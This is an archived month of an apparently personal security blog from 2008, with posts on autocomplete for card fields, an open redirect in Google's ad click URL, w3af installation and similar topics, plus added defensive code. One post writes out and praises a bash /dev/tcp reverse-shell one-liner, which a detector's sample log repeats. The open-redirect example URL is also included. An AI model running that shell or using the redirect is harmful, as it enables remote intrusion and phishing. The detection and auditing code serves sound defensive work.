Archive for April, 2008

autocomplete=off, yes… it’s really that simple.

One of my favourite things is Autocomplete. I'm sure plenty of security folks are cringing right now, but I enjoy it. It saves me a crapload of data entry every time I want to place an order (Name, Address, Phone number) or post a blog comment (Name, Email, Website)...

Anyways... what really bothers me is web developers who don't know about, or refuse to acknowledge the existence of, autocomplete. Let's compare two online ordering systems that I use frequently.

One contains a check box asking if you'd like it to remember your information (excluding credit card information). The entire order form is set to autocomplete=off and if I check the check box, my info is stored in a cookie with a very long expiry date.

The other doesn't save my info, I have to fill it out every time... This is where autocomplete is nice. Name, Address, Apartment Number, Buzzer Code, City, Postal Code, Phone, Email, etc.... Lots of info to provide but for me it's just first letter + tab. I like this feature... My problem is when I get to credit card information. This website hasn't seen the need to set the credit card related fields to autocomplete=off. Now I know that after I order I have to clear saved form data... this was once an issue though.

I ordered from this company via credit card, but then I moved over to cash orders... months later I happened to order via credit card again... this was when I discovered that the data was autocompleted. I find this very frightening for a number of reasons.

So I want to know... do web developers really have a hard time with autocomplete? I want to point out how important and how vital it is to your online form development. That's all... nothing really here, just a bit of a rant that I wanted to get out. Enjoy.
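The check the post is asking for can be automated. The following is an added example (not code from the original post or from either ordering site): a small audit that parses an order form's HTML and reports card-related input fields that would be autocompleted because neither the field nor the enclosing form sets autocomplete="off". The field-name hints and the sample form are constructed for illustration.

```python
"""Flag payment fields in an HTML form that the browser is allowed to autocomplete.

Added example, not from the original post.  It reports <input> elements whose
name/id looks like a card number, CVV or expiry field but whose effective
autocomplete value (field-level, else form-level) is not "off".
"""
from html.parser import HTMLParser

# Constructed list of name/id fragments that usually identify card fields.
CARD_FIELD_HINTS = ("card", "ccnum", "cvv", "cvc", "expir", "exp_")


class FormAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.form_autocomplete = None   # value on the enclosing <form>, if any
        self.findings = []              # (field name, reason)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_autocomplete = (a.get("autocomplete") or "").lower()
            return
        if tag != "input":
            return
        name = (a.get("name") or a.get("id") or "").lower()
        if not any(hint in name for hint in CARD_FIELD_HINTS):
            return
        field_ac = (a.get("autocomplete") or "").lower()
        # A field-level value wins; otherwise the <form> setting is inherited.
        effective = field_ac or self.form_autocomplete or ""
        if effective != "off":
            self.findings.append((name, f"autocomplete is {effective or 'unset'}"))

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_autocomplete = None


def audit_form(html):
    """Return a list of (field name, reason) for card fields that can be autocompleted."""
    parser = FormAuditor()
    parser.feed(html)
    return parser.findings


# Constructed sample: the card number field is unset, the expiry field is
# explicitly "on", and the CVV field is the only one done right.
SAMPLE_FORM = """
<form action="/order" method="post">
  <input name="name" type="text">
  <input name="address" type="text">
  <input name="cardnumber" type="text">
  <input name="cvv" type="text" autocomplete="off">
  <input name="expiry" type="text" autocomplete="on">
</form>
"""

if __name__ == "__main__":
    for field, reason in audit_form(SAMPLE_FORM):
        print(f"{field}: {reason}")
```

Setting autocomplete="off" on the whole form (as the first ordering site does) is the simplest way to pass this audit, but it also throws away the convenience on the name and address fields; the per-field form is what lets a site keep autocomplete for shipping details while excluding the card fields.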

Categories: IT

Malicious Flash on LiveJournal.com

I don't have much to add, simply details from the original post. Spyware Sucks has a post up documenting some malicious flash that is being served from LiveJournal.com (from one of their banner ads). Just thought I should share to keep people informed.

Categories: IT, Security

Kinda Quiet on the CDO Front

I've been kinda quiet here the last few days... That being said, I've been posting quite a bit on the nCircle VERT blog. I decided that I wouldn't cross post between blogs and I won't post links to CDO on the nCircle blog for no reason, however I will post links to the nCircle blog on here...

In the past few days I've posted these stories on the nCircle blog... feel free to give them a read:

I've got a couple interesting blog posts in the works, that will most likely show up here in the near future... but for now there's something to read.

Categories: IT, Security

Bash-based Reverse Shell

This is really cool... Neohapsis has a great blog post on how a one line bash shell command can create a reverse shell (via Infosec Ramblings).

Think about all those times when you needed a single command line to create a reverse shell... this will do it:

exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

That's it... plain and simple and you're done... no need for any outside tools... just the ability to run built-in shell commands.
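What makes the one-liner work is that /dev/tcp/host/port is not a real device: bash itself recognises the path in a redirection, opens a TCP socket, and attaches it to fd 0, after which 1>&0 and 2>&0 duplicate that socket onto stdout and stderr before /bin/sh is exec'd. Two consequences follow for a defender: the command has to be run from bash (dash or another /bin/sh will simply fail to open the path), and the literal string /dev/tcp/ in a command line is a high-signal indicator because the kernel never exposes such a path. The following is an added example, not code from the original post or from Neohapsis: a detector that runs over collected command-line records and extracts the protocol, host and port from any such redirection. The log lines are constructed samples in an auditd-like layout, with an address from the documentation range.

```python
"""Flag command lines that use bash's /dev/tcp or /dev/udp network redirections.

Added example, not from the original post.  Intended for command-line telemetry
(auditd EXECVE records, shell history, EDR process events).  Sample lines below
are constructed; 198.51.100.7 is a documentation-range address.
"""
import re

# bash resolves /dev/tcp/HOST/PORT itself; no such path exists in the kernel,
# so its presence in a command line is the signal regardless of the shell
# that is exec'd afterwards.
DEV_SOCKET = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s\"']+)/(?P<port>\d{1,5})")


def find_dev_socket_uses(lines):
    """Return (line_no, proto, host, port) for every /dev/tcp|udp reference found."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        for m in DEV_SOCKET.finditer(line):
            hits.append((line_no, m.group("proto"), m.group("host"), int(m.group("port"))))
    return hits


# Constructed sample records: line 1 is the post's one-liner wrapped in bash -c,
# line 2 is a benign /dev/shm listing, line 3 is a /dev/tcp read on a daytime port.
SAMPLE_LOG = [
    'type=EXECVE msg=audit(1207900000.101:42): argc=3 a0="bash" a1="-c" '
    'a2="exec /bin/sh 0</dev/tcp/198.51.100.7/4444 1>&0 2>&0"',
    'type=EXECVE msg=audit(1207900001.202:43): argc=2 a0="ls" a1="/dev/shm"',
    'type=EXECVE msg=audit(1207900002.303:44): argc=3 a0="bash" a1="-c" '
    'a2="cat < /dev/tcp/time.example.net/13"',
]

if __name__ == "__main__":
    for line_no, proto, host, port in find_dev_socket_uses(SAMPLE_LOG):
        print(f"line {line_no}: {proto} connection to {host}:{port}")
```

Real auditd EXECVE records hex-encode arguments that contain whitespace or quotes, so in practice the records should be decoded before this regex is applied; the pattern itself is what matters. Triage is simple: the line-3 style read from a known time service is routine, the line-1 style exec with stdin, stdout and stderr all on the socket is not.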

Categories: IT, Security

Problems with Firefox 2.0.0.14?

I'm wondering if anyone has been experiencing issues with Firefox 2.0.0.14? I installed it as soon as I noticed it... which I'm guessing was 6-7 hours ago but that may be +/- an hour or two. Since then I've had Firefox crash at least 6 times (never more than two tabs open... usually GMail and Bloglines). It just starts "Not Responding" and won't come back out of it.

System:

Windows XP SP2 fully updated
Core2 Quad Q6600 @ 2.40Ghz
3GB RAM available to the OS (32-bit OS)
Plugins Installed: SQL Inject Me, XSS Me, TamperData, User Agent Switcher, Web Developer, Firebug and Greasemonkey.

Categories: IT

Portions of MySQL May Go Closed Source (aka Company Offers “Paid Functionality”)

A while ago I stopped reading Slashdot because I generally find the information presented to be over-the-top and bordering on "zealot-like"... I suppose "overly dramatic" would work as well. However I was clicking through and ended up on the main page, which led to reading the following headline: Sun to Begin Close Sourcing MySQL. It led me to this article and I realized that the Slashdot headline was overzealous and so was Jeremy Cole.

Essentially, MySQL will be releasing some advanced features only to its enterprise customers. I get this... It makes business sense. The age old adage is, after all, "Why buy the cow, when you can get the milk for free". I kinda feel that the FOSS community sometimes feels a sense of entitlement that they don't deserve. There are plenty of FOSS users and supporters, but how many of them actually contribute back to FOSS? They do nothing, until they may lose some "advanced functionality"... then they scream as loud as anyone else.

Numerous people on Jeremy's website commented that MySQL was going to be giving "beta-like" software to their enterprise customers because they didn't have the community to test it. This puts way too much importance on the community. There are plenty of closed-source and paid software companies that ship software directly to enterprise customers without first running it by the FOSS community. This software does just fine.

In the end, this is a bunch of sour grapes over something that really isn't that big of a deal. Use another database or pay for the enterprise software.

Categories: IT

XP SP3 By The End of the Month

SANS ISC is reporting that various sources are saying that we may see XP SP3 before the end of the month, with OEMs and MSDN subscribers seeing the patch on April 21st and an end-user release date of April 28th.

Categories: IT

Gmail Google Talk Gone

About 15 minutes ago I had connection problems with my Google Apps account. My web-based Google Chat had disappeared, so I closed my browser and reopened it, but it's gone... completely gone... the Chat tab is even gone inside my settings options.

Anybody got any ideas?

Google Chat has Completely Disappeared

The X represents where the Chat Window normally is and the arrow points to where the chat settings would normally be.

Update:

Alex Word just pointed out that this is back up now. Thanks Alex!

Categories: IT

Redirect Validation… is it really that hard?

This isn't a new topic... McAfee mentioned it a couple of weeks ago, and it appeared in a ha.ckers.org comment almost 2 years ago.

It seems that Google Page Ad (http://www.google.com/pagead) can be abused as a redirect. This redirect won't work blindly; certain variables require certain values. However, those variables aren't validated... I can generate a valid redirect, and then substitute in any URL I want and it will still work. I've been noticing more and more spam lately making use of this, and it leads me to wonder why Google, with all their power (and I am a huge Google fan), can't get the validation right to ensure that this issue stops.

Here's an example URL... however in this case, I've removed the spammers address and inserted ComputerDefense.org: http://www.google.com/pagead/iclk?sa=l&ai=JqenDy&num=08582&adurl=http://www.computerdefense.org

Update:

In thinking this through more, I thought I should add to it. This redirect requires certain information... without the ai and num fields, the redirect won't work. All Google has to do is tie these fields to a specific URL, they don't even need the redirect URL included anymore... They could validate and redirect based on data they retrieve while validating the request.
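The fix proposed in the update can be shown in a few lines. The following is an added example, not Google's code: a minimal click-redirect handler in two forms. The first trusts the adurl parameter once ai and num are present, which is the behaviour the post describes (any destination can be swapped in). The second looks the destination up from the (ai, num) pair the server itself issued, so the request cannot supply a destination the server never registered. The parameter names and the example URL come from the post; the registry contents and the advertiser address are constructed.

```python
"""Open redirect via a trusted destination parameter, and the server-side binding that fixes it.

Added example, not Google's code.  Parameter names (sa, ai, num, adurl) follow
the post's example URL; AD_REGISTRY and its landing page are constructed.
"""
from urllib.parse import urlsplit, parse_qs

# Constructed server-side registry: the click id and ad number the server handed
# out map to the single destination they were issued for.
AD_REGISTRY = {
    ("JqenDy", "08582"): "https://advertiser.example/landing",
}


def _params(url):
    """Flatten the query string to a dict of first values."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def redirect_unchecked(url):
    """Vulnerable form: any adurl is accepted as long as ai and num are present.

    Returns the Location the handler would send, or None when it refuses.
    """
    p = _params(url)
    if "ai" not in p or "num" not in p or "adurl" not in p:
        return None
    return p["adurl"]


def redirect_bound(url):
    """Hardened form: the destination comes from the registry, never from the request.

    Unknown (ai, num) pairs are refused; an adurl that does not match the
    registered destination is treated as tampering and also refused.
    """
    p = _params(url)
    target = AD_REGISTRY.get((p.get("ai"), p.get("num")))
    if target is None:
        return None
    if "adurl" in p and p["adurl"] != target:
        return None
    return target


# The post's example URL: a valid-looking click with the destination swapped out.
SUBSTITUTED_URL = (
    "http://www.google.com/pagead/iclk?sa=l&ai=JqenDy&num=08582"
    "&adurl=http://www.computerdefense.org"
)

if __name__ == "__main__":
    print("unchecked:", redirect_unchecked(SUBSTITUTED_URL))
    print("bound:    ", redirect_bound(SUBSTITUTED_URL))
```

Once the destination is bound server-side the adurl parameter is only kept for compatibility; comparing it by exact string is deliberately strict, and if a deployment needs to tolerate legitimate variations it should canonicalise both sides before comparing rather than loosen the check to a prefix or substring match, which is how most redirect validators get bypassed.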

Categories: IT, Security

Installing W3AF on Windows XP

This morning I talked about W3AF beta6 being available. Only now did I finally get time to install it... I wanted to test drive the UI, and it ended up being quite the task to get it installed. Part way through I realized that this would be a somewhat time-consuming process and started documenting everything I had to do. I figured that others will most likely want to play with the UI on Windows XP so I'm going to share my documentation:

Installing w3af with UI on Windows XP with Python 2.5

Download pygoogle
Extract pygoogle
From your extracted directory run 'python setup.py install'

Download fpconst
Extract fpconst
From your extracted directory run 'python setup.py install'

Download SOAPpy
Extract SOAPpy
Edit <extractdir>\SOAPpy\Client.py; move the from __future__ import line to Line 1
Edit <extractdir>\SOAPpy\Types.py; move the from __future__ import line to Line 1
Edit <extractdir>\SOAPpy\Server.py; move the from __future__ import line to Line 1
From your extracted directory run 'python setup.py install'

Download gtk+ runtime
File: gtk2-runtime-2.12.1-2007-10-28-ash.exe
Install

Update gtk+ runtime
File: glib-2.16.2.zip
Extract Files
Copy files from \bin over gtk2-runtime install (default: C:\Program Files\GTK2-Runtime\lib)

Install pyGTK files
PyGTK 2.12.1-2
PyGobject 2.14.1-1
PyCairo 1.4.12-2

Download pyOpenSSL
Current Version: 0.7
Install

Download OpenSSL
Current Version: 0.9.8g Light
Install

Download w3af
Extract to directory
Browse to the w3af folder, create a shortcut to file w3af.
Modify shortcut target -- path\to\python25 path\to\w3af -g
Double Click shortcut
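The three SOAPpy edits above are the one step in this list that is easy to get wrong by hand, so here is an added helper (not part of SOAPpy or w3af) that does them: Python 2.5 rejects a `from __future__ import` that appears after any other statement, and the function below moves every such line to the top of a module, in its original order, leaving the rest of the file untouched. The sample module text is constructed.

```python
"""Hoist `from __future__ import ...` lines to the top of a Python module.

Added helper, not part of SOAPpy or w3af.  Python 2.5 only accepts __future__
imports at the start of a module, which is why the SOAPpy install steps say to
move that line to line 1 in Client.py, Types.py and Server.py.
"""
import re

FUTURE_IMPORT = re.compile(r"^\s*from\s+__future__\s+import\b")


def hoist_future_imports(source):
    """Return source with every __future__ import moved to the top, order preserved."""
    lines = source.splitlines(keepends=True)
    futures = [line.lstrip() for line in lines if FUTURE_IMPORT.match(line)]
    rest = [line for line in lines if not FUTURE_IMPORT.match(line)]
    return "".join(futures + rest)


def hoist_in_file(path):
    """Rewrite one file in place; return True when a line was moved."""
    with open(path, "r") as f:
        src = f.read()
    out = hoist_future_imports(src)
    if out == src:
        return False
    with open(path, "w") as f:
        f.write(out)
    return True


# Constructed sample: the __future__ import sits after a regular import,
# which is the layout Python 2.5 refuses to compile.
SAMPLE_MODULE = (
    "import sys\n"
    "from __future__ import nested_scopes\n"
    "def f():\n"
    "    return 1\n"
)

if __name__ == "__main__":
    # Usage against the extracted SOAPpy tree, e.g.:
    #   for name in ("Client.py", "Types.py", "Server.py"):
    #       hoist_in_file(r"<extractdir>\SOAPpy\" + name)
    print(hoist_future_imports(SAMPLE_MODULE), end="")
```

Running it twice is harmless: a file whose __future__ lines are already first comes back unchanged, so hoist_in_file reports False and does not rewrite it.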

Categories: IT, Tools